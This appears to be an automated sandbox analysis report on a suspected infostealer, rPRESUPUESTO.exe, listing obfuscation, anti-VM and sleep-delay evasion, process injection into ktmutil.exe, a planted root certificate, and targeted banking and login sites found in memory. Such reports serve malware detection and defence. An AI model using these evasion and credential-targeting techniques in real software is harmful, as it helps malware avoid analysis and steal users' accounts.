            Source: 0.2.rPRESUPUESTO.exe.3d2c408.1.raw.unpack, vFj8tfSZgqUlYsQxMp.csHigh entropy of concatenated method names: 'y9Jy35RRa0', 'sy6ypiTSuA', 'ClhyTRlbPt', 'YvNyHymtc8', 'YYjyNe3OmX', 'BVYTABXb1X', 'L6bTcTtYhA', 'FIsTVBjUJb', 'jhrT7MD3SY', 'XUrTDEKKIR'
            Source: 0.2.rPRESUPUESTO.exe.3d2c408.1.raw.unpack, ASVmU4DcMZrBmlKhdn.csHigh entropy of concatenated method names: 'qlHlSmAUJw', 'kQplY6rd28', 'Wp6l0fAp2x', 'vl0lPeWgKf', 'c9ZljWUKW5', 'N7NlZm7yiV', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.rPRESUPUESTO.exe.3d2c408.1.raw.unpack, g9VT4R8NH23savAS8y.csHigh entropy of concatenated method names: 'CFOmpREXH', 'bG4rB6jxd', 'aHovDNemB', 'gj4svE4Tl', 's9QgTtGy4', 'oWw1gifUZ', 'ioxvO00wCF9lcA6DVg', 'ajlr4mBnZ769RSx0QF', 'D49jwEYpeYrfarkWnR', 'kNLlV1xQb'
            Source: 0.2.rPRESUPUESTO.exe.3d2c408.1.raw.unpack, AjQT9mkG0ultOemfqx7.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'JJTLjH8whY', 'aCnL9xAyiN', 'u0xLOSw2b8', 'KmBLIh5pcY', 'ls5LApRAqR', 'fn8LchAfKy', 'd4eLVmvLa8'

            Hooking and other Techniques for Hiding and Protection

            barindex
            Loading BitLocker PowerShell Module
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AFE5D244A8D1194230FF479FE2F897BBCD7A8CB4 BlobJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\ktmutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\ktmutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\ktmutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\ktmutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\ktmutil.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: rPRESUPUESTO.exe PID: 3180, type: MEMORYSTR
            Switches to a custom stack to bypass stack traces
            Source: C:\Windows\SysWOW64\ktmutil.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
            Source: C:\Windows\SysWOW64\ktmutil.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
            Source: C:\Windows\SysWOW64\ktmutil.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
            Source: C:\Windows\SysWOW64\ktmutil.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
            Source: C:\Windows\SysWOW64\ktmutil.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
            Source: C:\Windows\SysWOW64\ktmutil.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
            Source: C:\Windows\SysWOW64\ktmutil.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
            Source: C:\Windows\SysWOW64\ktmutil.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeMemory allocated: D20000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeMemory allocated: 2950000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeMemory allocated: 2760000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeMemory allocated: 83F0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeMemory allocated: 93F0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeMemory allocated: 95D0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeMemory allocated: A5D0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeCode function: 5_2_0181096E rdtsc 5_2_0181096E
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeThread delayed: delay time: 240000Jump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeThread delayed: delay time: 239873Jump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeThread delayed: delay time: 239749Jump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeWindow / User API: threadDelayed 1817Jump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeWindow / User API: threadDelayed 5188Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4913Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 478Jump to behavior
            Source: C:\Windows\SysWOW64\ktmutil.exeWindow / User API: threadDelayed 9841Jump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\ktmutil.exeAPI coverage: 2.6 %
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exe TID: 3012Thread sleep time: -20291418481080494s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exe TID: 3012Thread sleep time: -240000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exe TID: 3012Thread sleep time: -239873s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exe TID: 3012Thread sleep time: -239749s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exe TID: 2352Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1576Thread sleep time: -2767011611056431s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6784Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\ktmutil.exe TID: 5852Thread sleep count: 131 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\ktmutil.exe TID: 5852Thread sleep time: -262000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\ktmutil.exe TID: 5852Thread sleep count: 9841 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\ktmutil.exe TID: 5852Thread sleep time: -19682000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe TID: 5656Thread sleep time: -55000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe TID: 5656Thread sleep time: -57000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe TID: 5656Thread sleep time: -37000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\ktmutil.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\ktmutil.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\ktmutil.exeCode function: 9_2_0019C0E0 FindFirstFileW,FindNextFileW,FindClose,9_2_0019C0E0
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeThread delayed: delay time: 240000Jump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeThread delayed: delay time: 239873Jump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeThread delayed: delay time: 239749Jump to behavior
            Source: C:\Users\user\Desktop\rPRESUPUESTO.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: 07c402-5.9.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: 07c402-5.9.drBinary or memory string: discord.comVMware20,11696428655f
            Source: 07c402-5.9.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: 07c402-5.9.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: 07c402-5.9.drBinary or memory string: global block list test formVMware20,11696428655
            Source: 07c402-5.9.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: 07c402-5.9.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: 07c402-5.9.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: 07c402-5.9.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: 07c402-5.9.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: 07c402-5.9.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: 07c402-5.9.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: 07c402-5.9.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: 07c402-5.9.drBinary or memory string: outlook.office365.comVMware20,11696428655t
            Source: 07c402-5.9.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
